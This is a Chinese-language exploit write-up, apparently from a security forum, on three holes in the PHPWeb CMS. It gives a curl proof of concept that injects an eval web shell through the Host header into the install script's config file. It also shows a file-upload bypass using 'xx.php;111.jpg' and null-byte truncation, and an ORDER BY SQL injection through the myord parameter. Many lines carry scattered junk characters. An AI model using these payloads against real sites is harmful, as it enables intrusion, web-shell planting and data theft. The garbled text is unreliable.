phpweb成品网站最新版(注入、上传、写shell)

admin

注入：
" }, M1 ]& `. J
% u) k* M2 Y9 {, C# L$ n之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码
8 P4 W% K" a  y4 R  o9 n2 d5 t1 m
: x( a& u4 s9 A* F鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
- a. c) x4 c8 y鸡肋2： 有一定安全常识的站长都会删掉 install 目录
6 k0 n' N/ Y6 W- ]/ I/ s. s
, B9 s% G5 I0 X$ V虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响

: D& n8 h' e9 A2 n2 C$ V分析：
" R3 \! h/ o+ {4 E: y$ B+ M: q5 P. F

$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤
: a! Q5 y# d" ?( V  S
                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
1 ~; p& w" O7 P' p2 x" V# s8 R                                            $filestr=str_replace(" ","",$filestr);
2 N# B. b, p0 u                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
6 D, Y5 N* I' ?8 a                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
! [/ f* T. D1 d) O3 w! `  N5 S/ {                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
& B4 d# k% B7 {* ]( n                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

1 D, x7 X4 n8 S% @! [8 Q; `                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

2 j5 q7 Y, r3 b+ tpoc：

?
  X& |- G! {, a1
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
跟之前的 phpcms一样 需要远程数据库

——————————————————–
! Y9 f0 Q( N  X6 m1 @4 I6 j$ n上传漏洞(需要进后台)：
- O& W7 U+ r4 L- G! K% ~& j6 D漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
  R" j7 r9 Z8 o' s5 a/ i
. H: b/ B6 J: l& @* N
<?php
    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
    NeedAuth(0);

    $dt=date("Ymd",time());
0 b* D$ s9 N1 g    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
    }
" y" q/ b. H7 z" l
* [2 |- G& F) e1 V. ]% b    //文件保存目录路径
9 }. j  ~. U9 X    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
0 o: ?8 j5 N0 ~9 n. |. W" V7 r    echo $save_path;
- Q: L, H1 l4 J    //文件保存目录URL
    $save_url = '../../'.$_POST['attachPath'].$dt.'/';
1 J+ f. ~, J6 p1 q# K
; {9 R8 N  p- _, o0 p+ E( ]    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀

$ x6 Z6 q* ~" X; M- `4 W$ ~1 x! }    //最大文件大小
    $max_size = 1000000;

( @0 q# H; O8 Q0 f6 A9 z9 a7 z. ]( X    //更改目录权限
    @mkdir($save_path, 0777);

    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名
- Y4 d+ I7 P8 V) {' C( S
    //文件URL
    $file_url = $save_url.$_POST['fileName'];
//有上传文件时
    if (empty($_FILES) === false) {
9 Y2 C2 ~2 U0 C' ^* w
5 u% Q; T8 w3 h: h6 z$ C            //原文件名
            $file_name = $_FILES['fileData']['name'];
            //服务器上临时文件名
7 K( `$ _1 ^! O; C            $tmp_name = $_FILES['fileData']['tmp_name'];
5 n3 J3 k/ k' @0 h            //文件大小
! R; ?# e! ~/ X4 a            $file_size = $_FILES['fileData']['size'];
            //检查目录
            if (@is_dir($save_path) === false) {
6 z. T: ]* i/ O  |6 i$ z+ \                    alert("上传目录不存在。");
1 T  ~; W% V$ i            }
            //检查目录写权限
6 n; r6 V! c3 W) e% j& ]( ^  c* X            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
            }
            //检查是否已上传
. ]6 B. n# I: L  S6 M: `            if (@is_uploaded_file($tmp_name) === false) {
                    alert("临时文件可能不是上传文件。");
            }
, c. N3 c9 V/ ]& P6 p( E* S            //检查文件大小
            if ($file_size > $max_size) {
                    alert("上传文件大小超过限制。");
            }
0 A' z' B4 }- f- i- E: A            //获得文件扩展名
, c; E6 V5 ^  `( e            $temp_arr = explode(".", $_POST['fileName']);
% D, L; l) x( O            $file_ext = array_pop($temp_arr);
            $file_ext = trim($file_ext);
            $file_ext = strtolower($file_ext);
5 d# w* R, P% y! _9 N0 K
) X, D% h9 t, {            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
8 z: V3 ?+ \* L                    alert("上传文件扩展名是不允许的扩展名。");
            }

            //移动文件   
            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
) Y, I' m/ R( P9 I! s, _8 \                    alert("上传文件失败。");
            }

& o; E  z* O* ]. }8 Q5 n            @chmod($file_path,0666);
5 f9 i, _* \" a) ~8 `. G
    ?>
0 y6 N5 e: I# r5 f$ Z3 ]/ w* Q- L抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227
2 a' ?  c$ G, D- R
apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

% H* \7 j( }& o8 C- E——————————————————
注入漏洞：
漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]
( v& x  R2 s; T
/ {, T, L% v+ N8 S! q9 ]* Y! V
<?php
  q2 c* ]( u7 j4 {8 F( V   //       ... 省略 n 行...
- \$ L+ Q1 G6 n- f   //第18行:
$ i7 x) O; c' Z2 J, Y& ^  A+ k           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
. p) {+ Q* g1 _) _+ b           $page=htmlspecialchars($_GET["page"]);
           $myord=htmlspecialchars($_GET["myord"]);
4 Y+ K/ f7 S% l* b
1 Q, [; v$ P" k   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
   //第47行 $key:

   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..
% ~* ?# Y! g6 V' Q2 U/ u6 K* D
   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
/ k5 H# m& [, g$ O/ Z' o
   ?>
  j* {$ T( ]! s" c8 J$ a8 b, }